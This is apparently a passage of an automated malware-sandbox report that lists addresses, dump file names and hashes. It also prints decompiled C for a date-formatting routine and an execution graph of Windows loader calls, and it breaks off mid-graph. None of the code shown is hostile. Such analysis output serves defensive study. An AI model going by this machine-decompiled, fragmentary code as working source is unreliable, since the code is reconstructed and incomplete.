                                                                                                0x02171fd2
                                                                                                0x00000000
                                                                                                0x02171fd7
                                                                                                0x02171fdb
                                                                                                0x02171fdb
                                                                                                0x02171fdb
                                                                                                0x02171f96
                                                                                                0x02171d3d
                                                                                                0x02171d3f
                                                                                                0x02171d42
                                                                                                0x02171d43
                                                                                                0x02171d46
                                                                                                0x02171d49
                                                                                                0x02171d4c
                                                                                                0x02171d4f
                                                                                                0x02171e54
                                                                                                0x02171e57
                                                                                                0x02171e59
                                                                                                0x02171f40
                                                                                                0x02171f4b
                                                                                                0x02171f52
                                                                                                0x02171f54
                                                                                                0x02171f57
                                                                                                0x02171f5c
                                                                                                0x02171f5d
                                                                                                0x02171f5f
                                                                                                0x00000000
                                                                                                0x02171f61
                                                                                                0x02171f61
                                                                                                0x02171f67
                                                                                                0x02171f69
                                                                                                0x02171f69
                                                                                                0x02171f74
                                                                                                0x02171f7b
                                                                                                0x02171f86
                                                                                                0x02171f86
                                                                                                0x02171e5f
                                                                                                0x02171e5f
                                                                                                0x02171e62
                                                                                                0x02171e65
                                                                                                0x02171e67
                                                                                                0x00000000
                                                                                                0x02171e6d
                                                                                                0x02171e6d
                                                                                                0x02171e74
                                                                                                0x02171ec5
                                                                                                0x02171ec5
                                                                                                0x02171eca
                                                                                                0x02171ed0
                                                                                                0x02171ed5
                                                                                                0x02171ed6
                                                                                                0x02171ed6
                                                                                                0x02171ee2
                                                                                                0x02171ef3
                                                                                                0x02171ef9
                                                                                                0x02171ef9
                                                                                                0x02171efb
                                                                                                0x02171f08
                                                                                                0x02171f0f
                                                                                                0x02171f13
                                                                                                0x02171f15
                                                                                                0x02171f1b
                                                                                                0x02171f1d
                                                                                                0x02171f1f
                                                                                                0x02171f1f
                                                                                                0x02171efd
                                                                                                0x02171efd
                                                                                                0x02171f01
                                                                                                0x02171f01
                                                                                                0x02171f24
                                                                                                0x02171f24
                                                                                                0x02171f26
                                                                                                0x02171f29
                                                                                                0x02171f30
                                                                                                0x02171f32
                                                                                                0x02171f36
                                                                                                0x02171e76
                                                                                                0x02171e76
                                                                                                0x02171e7b
                                                                                                0x02171e83
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02171e89
                                                                                                0x02171e8e
                                                                                                0x02171e8f
                                                                                                0x02171e95
                                                                                                0x02171e9d
                                                                                                0x02171ea3
                                                                                                0x02171ea8
                                                                                                0x02171ea9
                                                                                                0x00000000
                                                                                                0x02171ea9
                                                                                                0x00000000
                                                                                                0x02171e9d
                                                                                                0x02171eb1
                                                                                                0x02171eb4
                                                                                                0x02171eb7
                                                                                                0x02171eb9
                                                                                                0x02171f39
                                                                                                0x02171f39
                                                                                                0x00000000
                                                                                                0x02171ebb
                                                                                                0x02171ebb
                                                                                                0x02171ebe
                                                                                                0x02171ec1
                                                                                                0x02171ec3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02171ec3
                                                                                                0x02171eb9
                                                                                                0x02171e74
                                                                                                0x02171e67
                                                                                                0x02171d55
                                                                                                0x02171d55
                                                                                                0x02171d58
                                                                                                0x02171d5a
                                                                                                0x02171d64
                                                                                                0x02171d6a
                                                                                                0x02171d7d
                                                                                                0x02171d7d
                                                                                                0x02171d89
                                                                                                0x02171d8f
                                                                                                0x02171d91
                                                                                                0x02171d98
                                                                                                0x02171d9a
                                                                                                0x02171d9f
                                                                                                0x02171da7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x02171dac
                                                                                                0x02171db1
                                                                                                0x02171db7
                                                                                                0x02171dbf
                                                                                                0x02171dc4
                                                                                                0x02171dc9
                                                                                                0x00000000
                                                                                                0x02171dc9
                                                                                                0x00000000
                                                                                                0x02171dbf
                                                                                                0x02171dd1
                                                                                                0x02171dd1
                                                                                                0x02171dd1
                                                                                                0x02171dd6
                                                                                                0x02171dd9
                                                                                                0x02171ddb
                                                                                                0x02171dde
                                                                                                0x02171de1
                                                                                                0x02171dec
                                                                                                0x02171dee
                                                                                                0x02171df1
                                                                                                0x02171df3
                                                                                                0x02171df5
                                                                                                0x02171dfb
                                                                                                0x02171dfd
                                                                                                0x02171dfd
                                                                                                0x02171de3
                                                                                                0x02171de6
                                                                                                0x02171de6
                                                                                                0x02171e02
                                                                                                0x02171e08
                                                                                                0x02171e0c
                                                                                                0x02171e12
                                                                                                0x02171e19
                                                                                                0x02171e19
                                                                                                0x02171e1e
                                                                                                0x02171e2b
                                                                                                0x02171d6c
                                                                                                0x02171d6c
                                                                                                0x02171d72
                                                                                                0x02171e2c
                                                                                                0x02171e30
                                                                                                0x02171e35
                                                                                                0x02171e37
                                                                                                0x02171e41
                                                                                                0x02171e48
                                                                                                0x02171e48
                                                                                                0x02171e53
                                                                                                0x02171d78
                                                                                                0x02171d78
                                                                                                0x00000000
                                                                                                0x02171d78
                                                                                                0x02171d72
                                                                                                0x02171d5c
                                                                                                0x02171d60
                                                                                                0x02171d60
                                                                                                0x02171d5a
                                                                                                0x02171d4f
                                                                                                0x02171cac
                                                                                                0x02171cac
                                                                                                0x02171cb2
                                                                                                0x02171cb7
                                                                                                0x02171cf4
                                                                                                0x02171cf5
                                                                                                0x02171cfb
                                                                                                0x02171d02
                                                                                                0x02171d07
                                                                                                0x02171d09
                                                                                                0x02171d0b
                                                                                                0x02171d11
                                                                                                0x02171d13
                                                                                                0x02171d13
                                                                                                0x02171d1a
                                                                                                0x02171d1f
                                                                                                0x02171d23
                                                                                                0x02171d28
                                                                                                0x02171d2d
                                                                                                0x02171d2d
                                                                                                0x02171d32
                                                                                                0x02171cb9
                                                                                                0x02171cc2
                                                                                                0x02171cc8
                                                                                                0x02171ccc
                                                                                                0x02171cd1
                                                                                                0x02171cd3
                                                                                                0x02171cdd
                                                                                                0x02171ce4
                                                                                                0x00000000
                                                                                                0x02171ce9
                                                                                                0x02171ced
                                                                                                0x02171cc6
                                                                                                0x02171cc6
                                                                                                0x02171cc6
                                                                                                0x02171cc2
                                                                                                0x02171cb7

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 49bc50b9f22f3ee767c68eebfadacf91fc851553d5140a1e6982810560a67498
                                                                                                • Instruction ID: 3aa3ccdbb2cd2cfbe1606c134901c9ad1ec9b278654d47851e55cf00d4567c39
                                                                                                • Opcode Fuzzy Hash: 49bc50b9f22f3ee767c68eebfadacf91fc851553d5140a1e6982810560a67498
                                                                                                • Instruction Fuzzy Hash: 13A105727906002FD719AA7CDC943BEB3E69BC4325F28467EE11DCB381EB65C9858750
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02179718 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E02179718(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				intOrPtr _v284;
				char* _t34;
				intOrPtr* _t50;
				intOrPtr _t59;
				void* _t64;
				intOrPtr _t66;
				void* _t70;

				_v8 = 0;
				_t50 = __edx;
				_t64 = __eax;
				_push(_t70);
				_push(0x2179806);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xfffffee8;
				E021748A0(__edx);
				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
				if(_t64 > 2) {
					E02174938( &_v8, 0x2179828);
				} else {
					E02174938( &_v8, 0x217981c);
				}
				_t34 = E02174D64(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
					E02174B10(_t50, 0x100,  &_v280);
					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
						_v284 =  *_t50;
						_t66 = _v284;
						if(_t66 != 0) {
							_t66 =  *((intOrPtr*)(_t66 - 4));
						}
						E02174DC4( *_t50, _t66 - 1, 2, _t50);
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(E0217980D);
				return E021748A0( &_v8);
			}















                                                                                                0x02179725
                                                                                                0x02179728
                                                                                                0x0217972a
                                                                                                0x0217972e
                                                                                                0x0217972f
                                                                                                0x02179734
                                                                                                0x02179737
                                                                                                0x0217973c
                                                                                                0x02179748
                                                                                                0x02179753
                                                                                                0x0217975e
                                                                                                0x02179765
                                                                                                0x0217977e
                                                                                                0x02179767
                                                                                                0x0217976f
                                                                                                0x0217976f
                                                                                                0x02179792
                                                                                                0x021797ab
                                                                                                0x021797ba
                                                                                                0x021797c0
                                                                                                0x021797cb
                                                                                                0x021797d1
                                                                                                0x021797d9
                                                                                                0x021797de
                                                                                                0x021797de
                                                                                                0x021797eb
                                                                                                0x021797eb
                                                                                                0x021797c0
                                                                                                0x021797f2
                                                                                                0x021797f5
                                                                                                0x021797f8
                                                                                                0x02179805

                                                                                                APIs
                                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02179806), ref: 0217979E
                                                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02179806), ref: 021797A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: DateFormatLocaleThread
                                                                                                • String ID: yyyy
                                                                                                • API String ID: 3303714858-3145165042
                                                                                                • Opcode ID: c70230de2eec5c5ed9e5ec3094f83b1d0dc367eb8280f85448fe33c28ec23fc4
                                                                                                • Instruction ID: 8b46352951c1f9fadeb6d311b8e6b1654ebb6ba01833758a4f2fceb1a80a7144
                                                                                                • Opcode Fuzzy Hash: c70230de2eec5c5ed9e5ec3094f83b1d0dc367eb8280f85448fe33c28ec23fc4
                                                                                                • Instruction Fuzzy Hash: D5218E75A806589FDB14DFA8C881AAEB3FAEF88700F5144A5E945E7340D7309E44CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 021766E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocValue
                                                                                                • String ID: 8z~
                                                                                                • API String ID: 1189806713-3075776637
                                                                                                • Opcode ID: 8d1c9708b45a20e38c398dbc3a84f200dc27280c54f7ee19a905d10d9af2ed5c
                                                                                                • Instruction ID: fe6d96ae6673653f54cfc479f027b85f2e049d11b241c8f4d96f31846e54a0ba
                                                                                                • Opcode Fuzzy Hash: 8d1c9708b45a20e38c398dbc3a84f200dc27280c54f7ee19a905d10d9af2ed5c
                                                                                                • Instruction Fuzzy Hash: 8DC002E0DC0F819EEB04BFB6A554A1A36FDEB98354F841965B550C6144EB3AC8908FA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:0.5%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:65.1%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:99
                                                                                                execution_graph 18055 6ee5ba5 18056 6ee5bb4 _vswprintf_s 18055->18056 18061 6ee5c2a _vswprintf_s 18056->18061 18062 6ee5c10 18056->18062 18066 6ee4c56 18056->18066 18061->18062 18064 6ee60cf GetPEB 18061->18064 18065 6e59710 LdrInitializeThunk 18061->18065 18070 6e56de6 18061->18070 18076 6e6d130 18062->18076 18064->18061 18065->18061 18067 6ee4c62 _vswprintf_s 18066->18067 18068 6e6d130 _vswprintf_s 12 API calls 18067->18068 18069 6ee4caa 18068->18069 18069->18061 18071 6e56e73 18070->18071 18073 6e56e03 18070->18073 18071->18061 18073->18071 18074 6e56e53 18073->18074 18079 6e56ebe 18073->18079 18074->18071 18087 6e46a60 18074->18087 18077 6e5b640 _vswprintf_s 12 API calls 18076->18077 18078 6e6d13a 18077->18078 18078->18078 18092 6e2eef0 18079->18092 18081 6e56eeb 18084 6e56f0d 18081->18084 18103 6e57742 18081->18103 18109 6ec84e0 18081->18109 18097 6e2eb70 18084->18097 18086 6e56f48 18086->18073 18088 6e88025 18087->18088 18089 6e46a8d _vswprintf_s 18087->18089 18089->18088 18090 6e5b640 _vswprintf_s 12 API calls 18089->18090 18091 6e46b66 18090->18091 18091->18071 18093 6e2ef21 18092->18093 18095 6e2ef0c 18092->18095 18094 6e2ef29 18093->18094 18115 6e2ef40 18093->18115 18094->18081 18095->18081 18098 6e2eb81 18097->18098 18099 6e2eb9e 18097->18099 18098->18099 18101 6e2ebac 18098->18101 18379 6eaff10 18098->18379 18099->18086 18101->18099 18373 6e14dc0 18101->18373 18104 6e57827 18103->18104 18107 6e57768 _vswprintf_s 18103->18107 18104->18081 18106 6e2eef0 27 API calls 18106->18107 18107->18104 18107->18106 18108 6e2eb70 33 API calls 18107->18108 18446 6e59660 LdrInitializeThunk 18107->18446 18108->18107 18110 6ec8511 18109->18110 18111 6e2eb70 33 API calls 18110->18111 18114 6ec8556 18111->18114 18112 6e2eef0 27 API calls 18113 6ec85f1 18112->18113 18113->18081 18114->18112 18116 6e2f0bd 18115->18116 18117 6e2ef5d 18115->18117 18116->18117 18153 6e19080 18116->18153 18120 6e2f071 18117->18120 18122 6e2f042 18117->18122 18123 6e12d8a 18117->18123 18120->18095 18121 6e2f053 GetPEB 18121->18120 18122->18120 18122->18121 18124 6e12db8 18123->18124 18141 6e12df1 _vswprintf_s 18123->18141 18125 6e12de7 18124->18125 18124->18141 18159 6e12e9f 18124->18159 18125->18141 18163 6e41624 18125->18163 18127 6e6f9d0 GetPEB 18129 6e6f9e3 GetPEB 18127->18129 18129->18141 18133 6e12e5a 18134 6e12e61 18133->18134 18137 6e12e99 _vswprintf_s 18133->18137 18135 6e12e69 18134->18135 18136 6e37d50 GetPEB 18134->18136 18135->18117 18140 6e6fa76 18136->18140 18138 6e12ece 18137->18138 18206 6e595d0 LdrInitializeThunk 18137->18206 18138->18117 18142 6e6fa8a 18140->18142 18143 6e6fa7a GetPEB 18140->18143 18141->18127 18141->18129 18141->18133 18157 6e37d50 GetPEB 18141->18157 18170 6eafe87 18141->18170 18177 6eafdda 18141->18177 18183 6eaffb9 18141->18183 18191 6ea5720 18141->18191 18142->18135 18146 6e6fa97 GetPEB 18142->18146 18143->18142 18146->18135 18147 6e6faaa 18146->18147 18148 6e37d50 GetPEB 18147->18148 18149 6e6faaf 18148->18149 18150 6e6fac3 18149->18150 18151 6e6fab3 GetPEB 18149->18151 18150->18135 18194 6e97016 18150->18194 18151->18150 18154 6e19098 18153->18154 18155 6e1909e GetPEB 18153->18155 18154->18155 18156 6e190aa 18155->18156 18156->18117 18158 6e37d5d 18157->18158 18158->18141 18161 6e12ebb _vswprintf_s 18159->18161 18160 6e12ece 18160->18125 18161->18160 18207 6e595d0 LdrInitializeThunk 18161->18207 18208 6e416e0 18163->18208 18165 6e41630 18169 6e41691 18165->18169 18212 6e416c7 18165->18212 18168 6e4165a 18168->18169 18219 6e4a185 18168->18219 18169->18141 18171 6e37d50 GetPEB 18170->18171 18172 6eafec1 18171->18172 18173 6eafec5 GetPEB 18172->18173 18174 6eafed5 _vswprintf_s 18172->18174 18173->18174 18245 6e5b640 18174->18245 18176 6eafef8 18176->18141 18178 6eafdff __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18177->18178 18179 6ea5720 _vswprintf_s 12 API calls 18178->18179 18180 6eafe0f 18179->18180 18181 6ea5720 _vswprintf_s 12 API calls 18180->18181 18182 6eafe39 18181->18182 18182->18141 18184 6eaffc8 _vswprintf_s 18183->18184 18322 6e4e730 18184->18322 18333 6e1b171 18191->18333 18195 6e97052 18194->18195 18196 6e97073 GetPEB 18195->18196 18201 6e97084 18195->18201 18196->18201 18197 6e97125 GetPEB 18198 6e97136 18197->18198 18199 6e5b640 _vswprintf_s 12 API calls 18198->18199 18200 6e97147 18199->18200 18200->18135 18201->18198 18202 6e37d50 GetPEB 18201->18202 18204 6e97101 _vswprintf_s 18201->18204 18203 6e970ec 18202->18203 18203->18204 18205 6e970f0 GetPEB 18203->18205 18204->18197 18204->18198 18205->18204 18206->18138 18207->18160 18209 6e416ed 18208->18209 18210 6e416f3 GetPEB 18209->18210 18211 6e416f1 18209->18211 18210->18211 18211->18165 18213 6e855f4 18212->18213 18214 6e416da 18212->18214 18224 6ecbbf0 18213->18224 18214->18168 18218 6e8560a 18220 6e4a1a0 18219->18220 18221 6e4a192 18219->18221 18220->18221 18222 6e4a1b0 GetPEB 18220->18222 18221->18169 18223 6e4a1c1 18222->18223 18223->18169 18225 6ecbc12 18224->18225 18226 6e855fb 18225->18226 18232 6ecc08a 18225->18232 18226->18218 18228 6ecbf33 18226->18228 18229 6ecbf4c 18228->18229 18231 6ecbf97 18229->18231 18240 6ecbe9b 18229->18240 18231->18218 18233 6ecc0c6 18232->18233 18235 6ecc104 _vswprintf_s 18233->18235 18236 6ecbfdb 18233->18236 18235->18226 18238 6ecbfef 18236->18238 18239 6ecbfeb 18236->18239 18237 6ecbdfa LdrInitializeThunk 18237->18239 18238->18237 18238->18239 18239->18235 18241 6ecbeb3 18240->18241 18243 6ecbf08 18241->18243 18244 6e59660 LdrInitializeThunk 18241->18244 18243->18231 18244->18243 18246 6e5b648 18245->18246 18247 6e5b64b 18245->18247 18246->18176 18250 6ecb590 18247->18250 18249 6e5b74a _vswprintf_s 18249->18176 18253 6ecb260 18250->18253 18252 6ecb5a3 18252->18249 18311 6e6d08c 18253->18311 18255 6ecb26c GetPEB 18256 6ecb279 GetPEB 18255->18256 18258 6ecb293 18256->18258 18259 6ecb54b 18258->18259 18260 6ecb2ba 18258->18260 18261 6ecb48b 18258->18261 18267 6ecb56b _vswprintf_s 18259->18267 18312 6ea0c30 18259->18312 18263 6ecb414 18260->18263 18264 6ecb2c6 18260->18264 18262 6ea5720 _vswprintf_s 10 API calls 18261->18262 18265 6ecb49e 18262->18265 18266 6ea5720 _vswprintf_s 10 API calls 18263->18266 18268 6ecb32d 18264->18268 18269 6ecb2ce 18264->18269 18276 6ea5720 _vswprintf_s 10 API calls 18265->18276 18272 6ecb427 18266->18272 18267->18252 18278 6ecb396 18268->18278 18284 6ecb34d 18268->18284 18307 6ecb2eb 18268->18307 18270 6ecb2da 18269->18270 18271 6ecb2f3 18269->18271 18274 6ea5720 _vswprintf_s 10 API calls 18270->18274 18275 6ea5720 _vswprintf_s 10 API calls 18271->18275 18277 6ea5720 _vswprintf_s 10 API calls 18272->18277 18274->18307 18280 6ecb302 18275->18280 18281 6ecb4c2 18276->18281 18283 6ecb43e 18277->18283 18282 6ea5720 _vswprintf_s 10 API calls 18278->18282 18279 6ea5720 _vswprintf_s 10 API calls 18285 6ecb4fd 18279->18285 18286 6ea5720 _vswprintf_s 10 API calls 18280->18286 18287 6ecb4cc 18281->18287 18296 6ecb320 18281->18296 18288 6ecb3aa 18282->18288 18289 6ea5720 _vswprintf_s 10 API calls 18283->18289 18290 6ea5720 _vswprintf_s 10 API calls 18284->18290 18291 6ecb519 18285->18291 18299 6ea5720 _vswprintf_s 10 API calls 18285->18299 18292 6ecb311 18286->18292 18293 6ea5720 _vswprintf_s 10 API calls 18287->18293 18294 6ecb38f 18288->18294 18295 6ecb3b6 18288->18295 18289->18296 18297 6ecb361 18290->18297 18300 6ea5720 _vswprintf_s 10 API calls 18291->18300 18301 6ea5720 _vswprintf_s 10 API calls 18292->18301 18293->18307 18304 6ea5720 _vswprintf_s 10 API calls 18294->18304 18302 6ea5720 _vswprintf_s 10 API calls 18295->18302 18303 6ea5720 _vswprintf_s 10 API calls 18296->18303 18296->18307 18297->18294 18298 6ecb371 18297->18298 18308 6ea5720 _vswprintf_s 10 API calls 18298->18308 18299->18291 18305 6ecb528 18300->18305 18301->18296 18306 6ecb3c5 18302->18306 18303->18307 18304->18307 18305->18259 18310 6ea5720 _vswprintf_s 10 API calls 18305->18310 18309 6ea5720 _vswprintf_s 10 API calls 18306->18309 18307->18279 18308->18307 18309->18307 18310->18259 18311->18255 18313 6ea0c50 18312->18313 18315 6ea0c49 18312->18315 18314 6ea193b _vswprintf_s LdrInitializeThunk 18313->18314 18316 6ea0c5e 18314->18316 18315->18267 18316->18315 18317 6ea1c76 _vswprintf_s LdrInitializeThunk 18316->18317 18318 6ea0c70 18317->18318 18319 6ea0fec _vswprintf_s 12 API calls 18318->18319 18320 6ea0c91 18319->18320 18321 6ea193b _vswprintf_s LdrInitializeThunk 18320->18321 18321->18315 18328 6e59670 18322->18328 18330 6e5967a 18328->18330 18331 6e59681 18330->18331 18332 6e5968f LdrInitializeThunk 18330->18332 18334 6e1b180 _vswprintf_s 18333->18334 18335 6e1b1b0 GetPEB 18334->18335 18342 6e1b1c0 _vswprintf_s 18334->18342 18335->18342 18336 6e6d130 _vswprintf_s 10 API calls 18337 6e1b1de 18336->18337 18337->18141 18339 6e74904 GetPEB 18340 6e1b1d1 _vswprintf_s 18339->18340 18340->18336 18342->18339 18342->18340 18343 6e5e2d0 18342->18343 18346 6e5e2ed 18343->18346 18345 6e5e2e8 18345->18342 18347 6e5e30f 18346->18347 18348 6e5e2fb 18346->18348 18349 6e5e332 18347->18349 18351 6e5e31e 18347->18351 18355 6e5b58e 18348->18355 18360 6e62440 18349->18360 18352 6e5b58e _vswprintf_s 12 API calls 18351->18352 18354 6e5e307 _vswprintf_s 18352->18354 18354->18345 18356 6e1b150 _vswprintf_s 12 API calls 18355->18356 18357 6e5b627 18356->18357 18358 6e5b640 _vswprintf_s 12 API calls 18357->18358 18359 6e5b632 18358->18359 18359->18354 18361 6e624af 18360->18361 18362 6e6249a 18360->18362 18364 6e624b7 18361->18364 18371 6e624cc __aulldvrm _vswprintf_s 18361->18371 18363 6e5b58e _vswprintf_s 12 API calls 18362->18363 18366 6e624a4 18363->18366 18365 6e5b58e _vswprintf_s 12 API calls 18364->18365 18365->18366 18367 6e5b640 _vswprintf_s 12 API calls 18366->18367 18368 6e62d6e 18367->18368 18368->18354 18369 6e62d4f 18370 6e5b58e _vswprintf_s 12 API calls 18369->18370 18370->18366 18371->18366 18371->18369 18372 6e658ee 12 API calls __cftof 18371->18372 18372->18371 18374 6e14dd1 18373->18374 18375 6e14dfa 18373->18375 18378 6e14df3 18374->18378 18392 6e14f2e 18374->18392 18376 6e12e9f LdrInitializeThunk 18375->18376 18376->18374 18378->18099 18445 6e6d0e8 18379->18445 18381 6eaff1c GetPEB 18382 6eaff43 GetPEB 18381->18382 18384 6eaff2b 18381->18384 18385 6eaff4f 18382->18385 18386 6eaff6e 18382->18386 18383 6eaffb1 18387 6e6d130 _vswprintf_s 12 API calls 18383->18387 18384->18382 18384->18383 18388 6ea5720 _vswprintf_s 12 API calls 18385->18388 18389 6e4e730 2 API calls 18386->18389 18390 6eaffb6 18387->18390 18388->18386 18391 6eaff7d 18389->18391 18390->18101 18391->18101 18393 6e70b85 18392->18393 18398 6e14f3e 18392->18398 18394 6e70b8b GetPEB 18393->18394 18395 6e70b9a 18393->18395 18394->18395 18396 6e70b9f 18394->18396 18401 6ee88f5 18395->18401 18398->18393 18399 6e14f5b GetPEB 18398->18399 18399->18393 18400 6e14f6e 18399->18400 18400->18378 18402 6ee8901 _vswprintf_s 18401->18402 18407 6e1cc50 18402->18407 18404 6ee891f 18405 6e6d130 _vswprintf_s 12 API calls 18404->18405 18406 6ee8946 18405->18406 18406->18396 18410 6e1cc79 18407->18410 18408 6e5b640 _vswprintf_s 12 API calls 18409 6e1cc89 18408->18409 18409->18404 18412 6e1cc7e 18410->18412 18413 6e4b230 18410->18413 18412->18408 18414 6e8a2f6 18413->18414 18415 6e4b26a 18413->18415 18415->18414 18417 6e8a2fd 18415->18417 18421 6e4b2ab _vswprintf_s 18415->18421 18416 6e5b640 _vswprintf_s 12 API calls 18419 6e4b2d0 18416->18419 18418 6e4b2b5 18417->18418 18431 6ee5ba5 18417->18431 18418->18414 18418->18416 18419->18412 18421->18418 18423 6e1ccc0 18421->18423 18424 6e1cd04 18423->18424 18430 6e1cd95 18424->18430 18441 6e1b150 18424->18441 18427 6e1b150 _vswprintf_s 12 API calls 18428 6e74e14 18427->18428 18429 6e1b150 _vswprintf_s 12 API calls 18428->18429 18429->18430 18430->18418 18432 6ee5bb4 _vswprintf_s 18431->18432 18434 6ee4c56 12 API calls 18432->18434 18437 6ee5c2a _vswprintf_s 18432->18437 18438 6ee5c10 18432->18438 18433 6e6d130 _vswprintf_s 12 API calls 18435 6ee63e5 18433->18435 18434->18437 18435->18418 18437->18438 18439 6e56de6 32 API calls 18437->18439 18440 6ee60cf GetPEB 18437->18440 18444 6e59710 LdrInitializeThunk 18437->18444 18438->18433 18439->18437 18440->18437 18442 6e1b171 _vswprintf_s 12 API calls 18441->18442 18443 6e1b16e 18442->18443 18443->18427 18444->18437 18445->18381 18446->18107 18447 6e4fab0 18448 6e4fb14 18447->18448 18449 6e4fac2 18447->18449 18450 6e2eef0 27 API calls 18449->18450 18451 6e4facd 18450->18451 18452 6e4fadf 18451->18452 18456 6e4fb18 18451->18456 18453 6e2eb70 33 API calls 18452->18453 18454 6e4faf1 18453->18454 18454->18448 18455 6e4fafa GetPEB 18454->18455 18455->18448 18457 6e4fb09 18455->18457 18461 6e8bdcb 18456->18461 18483 6e26d90 18456->18483 18493 6e2ff60 18457->18493 18463 6e1b150 _vswprintf_s 12 API calls 18461->18463 18466 6e8be19 18461->18466 18482 6e8bea7 18461->18482 18462 6e276e2 GetPEB 18480 6e4fc4b 18462->18480 18463->18466 18464 6e4fba7 18468 6e4fbe4 18464->18468 18464->18480 18501 6e4fd22 18464->18501 18466->18482 18513 6e275ce 18466->18513 18469 6e4fc47 18468->18469 18470 6e8bf17 18468->18470 18468->18480 18473 6e4fd22 GetPEB 18469->18473 18469->18480 18472 6e4fd22 GetPEB 18470->18472 18470->18480 18471 6e8be54 18476 6e8be92 18471->18476 18471->18480 18517 6e276e2 18471->18517 18475 6e8bf22 18472->18475 18474 6e4fcb2 18473->18474 18474->18480 18505 6e4fd9b 18474->18505 18477 6e4fd9b 3 API calls 18475->18477 18475->18480 18481 6e276e2 GetPEB 18476->18481 18476->18482 18477->18480 18481->18482 18482->18462 18482->18480 18484 6e26dba 18483->18484 18486 6e26da4 18483->18486 18521 6e52e1c 18484->18521 18486->18461 18486->18464 18486->18480 18487 6e26dbf 18488 6e2eef0 27 API calls 18487->18488 18490 6e26dca 18488->18490 18489 6e26dde 18491 6e2eb70 33 API calls 18489->18491 18490->18489 18526 6e1db60 18490->18526 18491->18486 18494 6e2ff99 18493->18494 18495 6e2ff6d 18493->18495 18496 6ee88f5 33 API calls 18494->18496 18495->18494 18498 6e2ff80 GetPEB 18495->18498 18497 6e2ff94 18496->18497 18497->18448 18498->18494 18499 6e2ff8f 18498->18499 18638 6e30050 18499->18638 18502 6e4fd3a 18501->18502 18504 6e4fd31 _vswprintf_s 18501->18504 18502->18504 18672 6e27608 18502->18672 18504->18468 18506 6e4fdba GetPEB 18505->18506 18507 6e4fdcc 18505->18507 18506->18507 18508 6e8c0bd 18507->18508 18509 6e4fdf2 18507->18509 18510 6e4fdfc 18507->18510 18508->18510 18512 6e8c0d3 GetPEB 18508->18512 18509->18510 18511 6e276e2 GetPEB 18509->18511 18510->18480 18511->18510 18512->18510 18514 6e275eb 18513->18514 18515 6e275db 18513->18515 18514->18471 18515->18514 18516 6e27608 GetPEB 18515->18516 18516->18514 18518 6e276e6 18517->18518 18519 6e276fd 18517->18519 18518->18519 18520 6e276ec GetPEB 18518->18520 18519->18476 18520->18519 18522 6e52e32 18521->18522 18523 6e52e57 18522->18523 18534 6e59840 LdrInitializeThunk 18522->18534 18523->18487 18525 6e8df2e 18527 6e1db6d 18526->18527 18533 6e1db91 18526->18533 18527->18533 18535 6e1db40 GetPEB 18527->18535 18529 6e1db76 18529->18533 18537 6e1e7b0 18529->18537 18531 6e1db87 18532 6e74fa6 GetPEB 18531->18532 18531->18533 18532->18533 18533->18489 18534->18525 18536 6e1db52 18535->18536 18536->18529 18538 6e1e7e0 18537->18538 18539 6e1e7ce 18537->18539 18540 6e1e7e8 18538->18540 18543 6e1b150 